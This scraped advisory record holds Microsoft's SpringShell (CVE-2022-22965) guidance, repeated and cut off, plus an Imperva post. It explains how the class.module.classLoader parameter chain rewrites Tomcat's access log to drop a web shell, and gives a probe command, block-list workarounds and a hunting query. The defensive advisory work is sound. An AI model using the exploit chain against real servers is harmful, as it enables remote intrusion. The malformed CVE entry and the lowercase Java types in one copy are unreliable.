Observed activity\n\nMicrosoft regularly monitors attacks against our cloud infrastructure and services to defend them better. Since the Spring Core vulnerability was announced, we have been tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities. 
For CVE-2022-22965, the attempts closely align with the basic web shell POC described in this post.\n\nMicrosoft\u2019s continued monitoring of the threat landscape has not indicated a significant increase in quantity of attacks or new campaigns at this time.\n\n## Attack breakdown\n\nCVE-2022-22965 affects functions that use request mapping annotation and Plain Old Java Object (POJO) parameters within the Spring Framework. The POC code creates a controller that, when loaded into Tomcat, handles HTTP requests. \n\nThe only publicly available working POC is specific to Tomcat server's logging properties via the _ClassLoader_ module in the _propertyDescriptor_ cache. The attacker can update the _AccessLogValve_ class using the module to create a web shell in the Tomcat root directory called _shell.jsp_. The attacker can then change the default access logs to a file of their choosing.\n\nFigure 1. Screenshot from the original POC code post\n\nThe changes to _AccessLogValve_ can be achieved by an attacker who can use HTTP requests to create a _.jsp_ file in the service\u2019s root directory. In the example below, each GET parameter is set as a Java object property. Each GET request then executes Java code resembling the example below, wherein the final segment \u201csetPattern\u201d would be unique for each call (such as setPattern, setSuffix, setDirectory, and others): \n\n Figure 2. Screenshot from the original POC code post Figure 3. Screenshot from the original POC code post\n\nThe _.jsp_ file now contains a payload with a password-protected web shell with the following format:\n\n\n\nThe attacker can then use HTTP requests to execute commands. 
While the above POC depicts a command shell as the inserted code, this attack could be performed using any executable code.\n\n## The vulnerability and exploit in depth\n\nThe vulnerability in Spring results in a client's ability, in some cases, to modify sensitive internal variables inside the web server or application by carefully crafting the HTTP request.\n\nIn the case of the Tomcat web server, the vulnerability allowed the access log to be manipulated so that it is placed in an arbitrary path with somewhat arbitrary contents. The POC above sets the contents to be a JSP web shell and the path inside the Tomcat's web application ROOT directory, which essentially drops a web shell inside Tomcat. For the web application to be vulnerable, it needs to use Spring\u2019s request mapping feature, with the handler function receiving a Java object as a parameter.\n\n### Background\n\n#### Request mapping and request parameter binding\n\nSpring allows developers to map HTTP requests to Java handler methods. The web application's developer can ask Spring to call an appropriate handler method each time a user requests a specific URI. For instance, the following web application code will cause Spring to invoke the method _handleWeatherRequest_ each time a user requests the URI _/WeatherReport_:\n \n \n @RequestMapping(\"/WeatherReport\")\n public String handleWeatherRequest(Location reportLocation)\n {\n \u2026\n }\n\nMoreover, through request parameter binding, the handler method can accept arguments passed through parameters in GET/POST/REST requests. In the above example, Spring will instantiate a _Location_ object, initialize its fields according to the HTTP request\u2019s parameters, and pass it on to _handleWeatherRequest_. 
So, if, for instance, _Location_ is defined as:\n \n \n class Location \n { \n public void setCountry(String country) {\u2026} \n public void setCity(String city) {\u2026} \n public String getCountry() {\u2026} \n public String getCity() {\u2026} \n }\n\nIf we issue the following HTTP request:\n \n \n example.com/WeatherReport?country=USA&city=Redmond\n\nThe resulting call to _handleWeatherRequest_ will automatically have a _reportLocation_ argument with the country set to USA and city set to Redmond. \n\nIf _Location_ had a sub-object named _coordinates_, which contained _longitude_ and _latitude_ parameters, then Spring would try and initialize them out of the parameters of an incoming request. For example, when receiving a request with GET params _coordinates.longitude=123&coordinates.latitude=456_ Spring would try and set those values in the _coordinates_ member of _location_, before handing over control to _handleWeatherRequest_.\n\nThe SpringShell vulnerability directly relates to the process Spring uses to populate these fields.\n\n#### The process of property binding\n\nWhenever Spring receives an HTTP request mapped to a handler method as described above, it will try and bind the request\u2019s parameters for each argument in the handler method. Now, to stick with the previous example, suppose a client asked for:\n \n \n example.com/WeatherReport?x.y.z=foo\n\nSpring would instantiate the argument (in our case, create a _Location_ object). Then it breaks up the parameter name by dots (.) and tries to do a series of steps:\n\n 1. Use Java introspection to map all accessors and mutators in _location_\n 2. If location has a _getX()_ accessor, call it to get the _x_ member of location\n 3. Use Java introspection to map all accessors and mutators in the _x_ object\n 4. If the _x_ object has a _getY()_ accessor, call it to get the _y_ object inside of the _x_ object\n 5. Use Java introspection to map all accessors and mutators in the _y_ object\n 6. 
If the _y_ object has a _setZ()_ mutator, call it with parameter _\u201cfoo\u201d_\n\nSo essentially, ignoring the details, we get _location.getX().getY().setZ(\u201cfoo\u201d)_.\n\n### The vulnerability and its exploitation\n\n#### Prelude: CVE-2010-1622\n\nIn June 2010, a CVE was [published](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>) for the Spring framework. The crux of the CVE was as follows:\n\n 1. All Java objects implicitly contain a _getClass()_ accessor that returns the _Class_ describing the object's class.\n 2. _Class_ objects have a _getClassLoader()_ accessor the gets the _ClassLoader_ object.\n 3. Tomcat uses its own class loader for its web applications. This class loader contains various members that can affect Tomcat\u2019s behavior. One such member is _URLs_, which is an array of URLs the class loader uses to retrieve resources.\n 4. Overwriting one of the URLs with a URL to a remote JAR file would cause Tomcat to subsequently load the JAR from an attacker-controlled location.\n\nThe bug was fixed in Spring by preventing the mapping of the _getClassLoader()_ or _getProtectionDomain()_ accessors of _Class_ objects during the property-binding phase. Hence _class.classLoader_ would not resolve, thwarting the attack.\n\n#### The current exploit: CVE-2022-22965\n\nThe current exploit leverages the same mechanism as in CVE-2010-1622, bypassing the previous bug fix. Java 9 added a new technology called Java Modules. An accessor was added to the _Class_ object, called _getModule()_. The _Module_ object contains a _getClassLoader()_ accessor. Since the CVE-2010-1622 fix only prevented mapping the _getClassLoader()_ accessor of _Class_ objects, Spring mapped the _getClassLoader()_ accessor of the _Module_ object. 
Once again, one could reference the class loader from Spring via the _class.module.classLoader_ parameter name prefix.\n\n#### From _ClassLoader_ to _AccessLogValve_\n\nThe latest exploit uses the same accessor chaining, via the Tomcat class loader, to drop a JSP web shell on the server.\n\nThis is done by manipulating the properties of the _AccessLogValve_ object in Tomcat\u2019s pipeline. The _AccessLogValve _is referenced using the _class.module.classLoader.resources.context.parent.pipeline.first_ parameter prefix.\n\nThe following properties are changed:\n\n 1. **Directory: **The path where to store the access log, relative to Tomcat\u2019s root directory. This can be manipulated to point into a location accessible by http requests, such as the web application\u2019s directory.\n 2. **Prefix: **The prefix of the access log file name\n 3. **Suffix: **The suffix of the access log file name. The log file name is a concatenation of the prefix with the suffix.\n 4. **Pattern: **A string that describes the log record structure. This can be manipulated so that each record will essentially contain a JSP web shell.\n 5. **FileDateFormat:** Setting this causes the new access log settings to take effect.\n\nOnce the web shell is dropped on the server, the attacker can execute commands on the server as Tomcat.\n\n## Discovery and mitigations\n\n### How to find vulnerable devices\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/threat-protection/endpoint-defender>) monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities. 
\n\nCustomers can now search for CVE-2022-22965 to find vulnerable devices through the [Weaknesses](<https://securitycenter.microsoft.com/vulnerabilities?search=CVE-2022-22965>) page in threat and vulnerability management.\n\nFigure 4. Weaknesses page in Microsoft Defender for Endpoint\n\n### Enhanced protection with Azure Firewall Premium\n\nCustomers using [Azure Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-migrate>) have enhanced protection from the SpringShell CVE-2022-22965 vulnerability and exploits. Azure Firewall Premium Intrusion Detection and Prevention System (IDPS) provides IDPS inspection for all east-west traffic, outbound traffic to the internet, and inbound HTTP traffic from the internet. The vulnerability rulesets are continuously updated and include vulnerability protection for SpringShell since March 31, 2022. The screenshot below shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\nConfigure Azure Firewall Premium with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against CVE-2022-22965 exploit. \n\nFigure 5. Azure Firewall Premium portal detecting CVE-2022-22965 exploitation attempts.\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/azure/firewall/premium-migrate>). 
Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-features>).\n\n### Detect and protect with Azure Web Application Firewall (Azure WAF)\n\nAzure Web Application Firewall (WAF) customers with Azure Front Door and Azure Application Gateway deployments now have enhanced protection for the SpringShell exploit - [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and other high impact Spring vulnerabilities [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>) and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). To help detect and mitigate these critical Spring vulnerabilities, we have released four new rules.\n\n#### Global WAF with Azure Front Door\n\nAzure WAF has updated Default Rule Set (DRS) versions 2.0/1.1/1.0.\n\n * Rule group: _MS-ThreatIntel-WebShells_, Rule Id: 99005006 - Spring4Shell Interaction Attempt\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001014 - Attempted Spring Cloud routing-expression injection (CVE-2022-22963)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001015 - Attempted Spring Framework unsafe class object exploitation (CVE-2022-22965)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001016 - Attempted Spring Cloud Gateway Actuator injection (CVE-2022-22947)\n\nWAF rules on Azure Front Door are disabled by default on existing Microsoft managed rule sets.\n\nFigure 6. Screenshot of WAF Spring vulnerabilities\n\n#### Regional WAF with Azure Application Gateway\n\nAzure WAF has updated OWASP Core Rule Set (CRS) versions for Azure Application Gateway WAF V2 regional deployments. 
New rules are under _Known_CVEs_ rule group:\n\n * Rule Id: 800110 - _Spring4Shell Interaction Attempt_\n * Rule Id: 800111 - _Attempted Spring Cloud routing-expression injection_ - CVE-2022-22963\n * Rule Id: 800112 - _Attempted Spring Framework unsafe class object exploitation_ - CVE-2022-22965\n * Rule Id: 800113 - _Attempted Spring Cloud Gateway Actuator injection_ - CVE-2022-22947\n\nWAF rules on Azure Application Gateway are _enabled_ by default for supported CRS versions.\n\nFigure 7. Spring vulnerability rules for Azure Application Gateway OWASP Core Rule Set (CRS)\n\n**Recommendation**: Enable WAF SpringShell rules to get protection from these threats. We will continue to monitor threat patterns and modify the above rules in response to emerging attack patterns as required. \n\nFor more information about Managed Rules and Default Rule Set (DRS) on Azure Front Door, see the [Web Application Firewall DRS rule groups and rules documentation](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). For more information about Managed Rules and OWASP Core Rule Set (CRS) on Azure Application Gateway, see the [Web Application Firewall CRS rule groups and rules documentation](<https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules?tabs=owasp32>)\n\n### Patch information and workarounds\n\nCustomers are encouraged to apply these mitigations to reduce the impact of this threat. Check the recommendations card in Microsoft 365 Defender threat and vulnerability management for the deployment status of monitored mitigations.\n\n * An [update](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>) is available for CVE-2022-22965. Administrators should upgrade to versions 5.3.18 or later or 5.2.19 or later. 
If the patch is applied, no other mitigation is necessary. Note that 5.2.19 also appears in the impacted version range listed earlier in this post, so confirm the fixed 5.2.x release against the Spring advisory before treating a 5.2.19 system as patched.\n\nIf you\u2019re unable to patch CVE-2022-22965, you can implement this set of workarounds published by [Spring](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>):\n\n * Search the application globally for the @InitBinder annotation to see whether the dataBinder.setDisallowedFields method is called in the method body. If this code snippet is found, add `{\"class.*\",\"Class.*\",\"*.class.*\", \"*.Class.*\"}` to the original blacklist. (**Note:** If this code snippet is used a lot, it needs to be appended in each location.)\n * Add the following global class into the package where the Controller is located. Then recompile and test the project for functionality:\n \n \n import org.springframework.core.annotation.Order;\n import org.springframework.web.bind.WebDataBinder;\n import org.springframework.web.bind.annotation.ControllerAdvice;\n import org.springframework.web.bind.annotation.InitBinder;\n @ControllerAdvice\n @Order(10000)\n public class GlobalControllerAdvice{\n @InitBinder\n public void setAllowedFields(WebDataBinder dataBinder){\n String[]abd=new String[]{\"class.*\",\"Class.*\",\"*.class.*\",\"*.Class.*\"};\n dataBinder.setDisallowedFields(abd);\n }\n }\n\n## Detections\n\n### Microsoft 365 Defender\n\n#### Endpoint detection and response (EDR)\n\nAlerts with the following title in the security center can indicate threat activity on your network:\n\n * Possible SpringShell exploitation\n\nThe following alert can indicate an observed attack, but might not be unique to exploitation of this vulnerability:\n\n * Suspicious process executed by a network service\n\n#### Antivirus\n\nMicrosoft Defender antivirus version **1.361.1234.0** or later detects components and behaviors related to this threat with the following detections:\n\n * Trojan:Python/SpringShellExpl\n * Exploit:Python/SpringShell\n * Backdoor:PHP/Remoteshell.V\n\n### Hunting\n\n#### 
Microsoft 365 Defender advanced hunting queries \n\nUse the query below to surface exploitation of CVE-2022-22965 on both victim devices and devices performing the exploitation. Note that this query only covers exploitation over HTTP, not HTTPS, and that it matches on the \".jsp?cmd=\" request pattern of the POC web shell, so a web shell that uses a different extension or parameter name would not be surfaced.\n \n \n DeviceNetworkEvents\n | where Timestamp > ago(7d)\n | where ActionType =~ \"NetworkSignatureInspected\"\n | where AdditionalFields contains \".jsp?cmd=\"\n | summarize makeset(AdditionalFields, 5), min(Timestamp), max(Timestamp) by DeviceId, DeviceName \n\n#### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for this threat activity:\n\n * [Possible SpringShell exploitation attempt (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringShellExploitationAttempt.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible SpringShell exploitation attempts (CVE-2022-22965) to drop a malicious web shell in a location accessible by HTTP requests. Attackers then make requests to the malicious backdoor to run system commands.\n * [Possible web shell usage attempt related to SpringShell (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringshellWebshellUsage.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible web shell usage related to SpringShell RCE vulnerability (CVE-2022-22965).\n * [AV detections related to SpringShell Vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityAlert/AVSpringShell.yaml>) \u2013 This query looks for Microsoft Defender for Endpoint hits related to the SpringShell vulnerability. In Microsoft Sentinel, the _SecurityAlerts_ table includes only the device name of the affected device. This query joins the _DeviceInfo_ table to clearly connect other information such as device group, IP address, signed in users, and others. 
This allows the Microsoft Sentinel analyst to have more context related to the alert, if available.\n\n**Revision history**\n\n_[04/11/2022] \u2013 _Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See _Detection and Mitigation section for details_.\n\n_[04/08/2022] \u2013 Azure Web Application Firewall (WAF) customers with Azure Front Door now has enhanced protection for Spring4Shell exploits - CVE-2022-22963, CVE-2022-22965, and CVE-2022-22947. See Detection and Mitigation section for details. \n[04/05/2022] \u2013 We added Microsoft Sentinel hunting queries to look for SpringShell exploitation activity._\n\nThe post [SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965](<https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T01:11:24", "type": "mmpc", "title": "SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2202-22965"], "modified": "2022-04-05T01:11:24", "id": "MMPC:07417E2EE012BAE0350B156AD2AE30B3", "href": "https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2022-03-31T18:03:34", "description": "New zero-day Remote Code Execution (RCE) vulnerabilities were discovered in Spring Framework, an application development framework and inversion of control container for the Java platform. The vulnerability potentially leaves millions of applications at risk of compromise. In two separate disclosures, [zero-day](<https://www.imperva.com/learn/application-security/zero-day-exploit/>) RCE vulnerabilities were revealed in the Cloud and Core modules of Spring Framework.\n\nSpring Framework \u201cprovides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform\u201d [[1](<https://spring.io/projects/spring-framework>)]. Java is one of the most commonly used development languages, and Spring is commonly cited as one of the most popular Java frameworks.\n\nThe first of the disclosures [dropped](<https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html>) on March 26, and reported on a vulnerability in the Spring Framework Cloud module, which allowed for the injection of a SPeL expression into a header value. 
This crafted header value would then be evaluated by the server and could result in a RCE. The vulnerability was assigned [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>).\n\nThe second of these disclosures was released on March 29 on Twitter by a researcher, in a since-deleted Tweet, containing a screenshot of the exploit request. Since then, the exploit was tweeted by others and published to GitHub, but again, was quickly removed. The vulnerability, called Spring Framework RCE via Data Binding on JDK 9+, comes in the form of a Java class injection flaw in Spring Core, where the JDK version is >=9.0. If exploited, an attacker can leverage this vulnerability to perform a RCE on the server. This vulnerability was assigned [CVE-2022-22965](<https://tanzu.vmware.com/security/CVE-2022-22965>).\n\nSince the disclosures, Imperva Threat Research monitored widespread attempted exploitations of _both_ new zero-day vulnerabilities (~5.5 million and counting as of March 31).\n\n## Imperva Delivers Protection from CVE-2022-22963\n\nImperva Threat Research analysts downloaded and quickly tested the exploit, verifying that both vulnerabilities are blocked out of the box by [Imperva Cloud Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) and Imperva WAF Gateway.\n\nGiven the nature of how [Imperva Runtime Protection (RASP)](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) works, RCEs caused by CVE-2022-22963 and Spring4Shell are stopped without requiring any code changes or policy updates. If Imperva RASP is currently deployed, applications of all kinds (active, legacy, third-party, APIs, etc.) are protected.\n\nTogether, Imperva WAF and Imperva RASP provide defense-in-depth for protecting applications and APIs. Both are industry-leading products that are designed to protect against zero day threats and the OWASP Top 10 application security threats, injections and weaknesses. 
If you\u2019re looking for protection from CVE-2022-22963, please contact us.\n\n**Q: How can I verify that Spring Framework RCE via Data Binding on JDK 9+ (Spring4Shell) is being blocked?**\n\n**A:** For CWAF customers, Imperva provides attack analytics, which shows customers any attempts to exploit CVE-2022-22963. In addition, existing rules for older vulnerabilities including CVE-2015-1427 protect against CVE-2022-22965.\n\nFor WAF Gateway customers, Imperva has signatures for older vulnerabilities, including CVE-2010-1871, CVE-2018-1260, and CVE-2015-1427 that protect against CVE-2022-22963 and CVE-2022-22965\n\nImperva is also in the process of pushing more specific rules that will have a clear name associated with CVE-2022-22963 and CVE-2022-22965.\n\nThe post [Imperva Protects from New Spring Framework Zero-Day Vulnerabilities](<https://www.imperva.com/blog/imperva-protects-from-new-spring-framework-zero-day-vulnerabilities/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:20:03", "type": "impervablog", "title": "Imperva Protects from New Spring Framework Zero-Day Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2015-1427", "CVE-2018-1260", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T15:20:03", "id": "IMPERVABLOG:45FA8B88D226614CA46C4FD925A08C8B", "href": "https://www.imperva.com/blog/imperva-protects-from-new-spring-framework-zero-day-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2022-04-11T23:40:23", "description": "**_April 11, 2022 update_** \u2013 __Azure Web Application Firewall (WAF) customers with Regional WAF with Azure Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See [](<https://www.microsoft.com/security/blog/wp-admin/post.php?post=110715&action=edit#detectandprotect>)Detect and protect with Azure Web Application Firewall (Azure WAF) section for details__.\n\nOn March 31, 2022, vulnerabilities in the Spring Framework for Java were [publicly disclosed](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>). Microsoft is currently assessing the impact associated with these vulnerabilities. This blog is for customers looking for protection against exploitation and ways to detect vulnerable installations on their network of the critical remote code execution (RCE) vulnerability [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>) (also known as SpringShell or Spring4Shell).\n\nThe Spring Framework is the most widely used lightweight open-source framework for Java. 
In Java Development Kit (JDK) version 9.0 or later, a remote attacker can obtain an _AccessLogValve _object through the framework\u2019s parameter binding feature and use malicious field values to trigger the pipeline mechanism and write to a file in an arbitrary path, if certain conditions are met. \n\nThe vulnerability in Spring Core\u2014referred to in the security community as SpringShell or Spring4Shell\u2014can be exploited when an attacker sends a specially crafted query to a web server running the Spring Core framework. Other vulnerabilities disclosed in the same component are less critical and not tracked as part of this blog.\n\nImpacted systems have the following traits:\n\n * Running JDK 9.0 or later\n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and earlier versions\n * Apache Tomcat as the Servlet container:\n * Packaged as a traditional Java web archive (WAR) and deployed in a standalone Tomcat instance; typical Spring Boot deployments using an embedded Servlet container or reactive web server are not impacted\n * Tomcat has _spring-webmvc_ or _spring-webflux_ dependencies\n\nAny system using JDK 9.0 or later and using the Spring Framework or derivative frameworks should be considered vulnerable. The following nonmalicious command can be used to determine vulnerable systems:\n \n \n $ curl host:port/path?class.module.classLoader.URLs%5B0%5D=0\n\nA host that returns an HTTP 400 response should be considered vulnerable to the attack detailed in the proof of concept (POC) below. 
Note that while this test is a good indicator of a system\u2019s susceptibility to an attack, any system within the scope of impacted systems listed above should still be considered vulnerable.\n\nThe [](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)[threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) console within [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) provides detection and reporting for this vulnerability.\n\nThis blog covers the following topics:\n\n 1. Observed activity\n 2. Attack breakdown\n 3. The vulnerability and exploit in depth\n * Background\n * Request mapping and request parameter binding\n * The process of property binding\n * The vulnerability and its exploitation\n * Prelude: CVE-2010-1622\n * The current exploit: CVE-2022-22965\n * From ClassLoader to AccessLogValve\n 4. Discovery and mitigations\n * How to find vulnerable devices\n * Enhanced protection with Azure Firewall Premium\n * Detect and protect with Azure Web Application Firewall (Azure WAF)\n * Global WAF with Azure Front Door\n * Regional WAF with Azure Application Gateway\n * Patch information and workarounds\n 5. Detections\n * Microsoft 365 Defender\n * Endpoint detection and response (EDR)\n * Antivirus\n * Hunting\n * Microsoft 365 Defender advanced hunting queries \n * Microsoft Sentinel\n\n## Observed activity\n\nMicrosoft regularly monitors attacks against our cloud infrastructure and services to defend them better. Since the Spring Core vulnerability was announced, we have been tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities. 
For CVE-2022-22965, the attempts closely align with the basic web shell POC described in this post.\n\nMicrosoft\u2019s continued monitoring of the threat landscape has not indicated a significant increase in quantity of attacks or new campaigns at this time.\n\n## Attack breakdown\n\nCVE-2022-22965 affects functions that use request mapping annotation and Plain Old Java Object (POJO) parameters within the Spring Framework. The POC code creates a controller that, when loaded into Tomcat, handles HTTP requests. \n\nThe only publicly available working POC is specific to Tomcat server's logging properties via the _ClassLoader_ module in the _propertyDescriptor_ cache. The attacker can update the _AccessLogValve_ class using the module to create a web shell in the Tomcat root directory called _shell.jsp_. The attacker can then change the default access logs to a file of their choosing.\n\nFigure 1. Screenshot from the original POC code post\n\nThe changes to _AccessLogValve_ can be achieved by an attacker who can use HTTP requests to create a _.jsp_ file in the service\u2019s root directory. In the example below, each GET parameter is set as a Java object property. Each GET request then executes Java code resembling the example below, wherein the final segment \u201csetPattern\u201d would be unique for each call (such as setPattern, setSuffix, setDirectory, and others): \n\n Figure 2. Screenshot from the original POC code post Figure 3. Screenshot from the original POC code post\n\nThe _.jsp_ file now contains a payload with a password-protected web shell with the following format:\n\n\n\nThe attacker can then use HTTP requests to execute commands. 
While the above POC depicts a command shell as the inserted code, this attack could be performed using any executable code.\n\n## The vulnerability and exploit in depth\n\nThe vulnerability in Spring results in a client's ability, in some cases, to modify sensitive internal variables inside the web server or application by carefully crafting the HTTP request.\n\nIn the case of the Tomcat web server, the vulnerability allowed the access log to be manipulated so that it is written to an arbitrary path with somewhat arbitrary contents. The POC above sets the contents to be a JSP web shell and the path to be inside Tomcat's web application ROOT directory, which essentially drops a web shell inside Tomcat. For the web application to be vulnerable, it needs to use Spring\u2019s request mapping feature, with the handler function receiving a Java object as a parameter.\n\n### Background\n\n#### Request mapping and request parameter binding\n\nSpring allows developers to map HTTP requests to Java handler methods. The web application's developer can ask Spring to call an appropriate handler method each time a user requests a specific URI. For instance, the following web application code will cause Spring to invoke the method _handleWeatherRequest_ each time a user requests the URI _/WeatherReport_:\n \n \n @RequestMapping(\"/WeatherReport\")\n public string handleWeatherRequest(Location reportLocation)\n {\n \u2026\n }\n\nMoreover, through request parameter binding, the handler method can accept arguments passed through parameters in GET/POST/REST requests. In the above example, Spring will instantiate a _Location_ object, initialize its fields according to the HTTP request\u2019s parameters, and pass it on to _handleWeatherRequest_. 
So, for instance, if _Location_ is defined as:\n \n \n class Location \n { \n public void setCountry(string country) {\u2026} \n public void setCity(string city) {\u2026} \n public string getCountry() {\u2026} \n public string getCity() {\u2026} \n }\n\nIf we issue the following HTTP request:\n \n \n example.com/WeatherReport?country=USA&city=Redmond\n\nThe resulting call to _handleWeatherRequest_ will automatically have a _reportLocation_ argument with the country set to USA and city set to Redmond. \n\nIf _Location_ had a sub-object named _coordinates_, which contained _longitude_ and _latitude_ parameters, then Spring would try and initialize them out of the parameters of an incoming request. For example, when receiving a request with GET params _coordinates.longitude=123&coordinates.latitude=456_ Spring would try and set those values in the _coordinates_ member of _location_, before handing over control to _handleWeatherRequest_.\n\nThe SpringShell vulnerability directly relates to the process Spring uses to populate these fields.\n\n#### The process of property binding\n\nWhenever Spring receives an HTTP request mapped to a handler method as described above, it will try and bind the request\u2019s parameters for each argument in the handler method. Now, to stick with the previous example, suppose a client asked for:\n \n \n example.com/WeatherReport?x.y.z=foo\n\nSpring would instantiate the argument (in our case, create a _Location_ object). Then it breaks up the parameter name by dots (.) and tries to do a series of steps:\n\n 1. Use Java introspection to map all accessors and mutators in _location_\n 2. If _location_ has a _getX()_ accessor, call it to get the _x_ member of _location_\n 3. Use Java introspection to map all accessors and mutators in the _x_ object\n 4. If the _x_ object has a _getY()_ accessor, call it to get the _y_ object inside of the _x_ object\n 5. Use Java introspection to map all accessors and mutators in the _y_ object\n 6. 
